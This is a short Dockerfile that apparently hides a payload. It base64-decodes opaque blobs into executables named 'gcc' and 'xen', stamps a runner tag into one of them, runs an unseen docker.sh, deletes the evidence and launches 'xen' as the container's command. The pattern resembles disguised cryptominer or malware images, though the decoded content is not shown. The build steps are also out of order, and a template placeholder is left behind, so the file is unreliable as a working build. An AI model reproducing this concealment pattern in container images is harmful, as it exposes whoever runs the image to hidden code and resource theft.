FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > xen.log'
RUN base64 --decode xen.64 > xen
RUN base64 --decode gcc.64 > gcc
RUN chmod +x gcc

COPY xen .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' xen
RUN bash ./docker.sh
RUN rm --force --recursive xen _REPO_NAME__.64 docker.sh gcc gcc.64

CMD xen
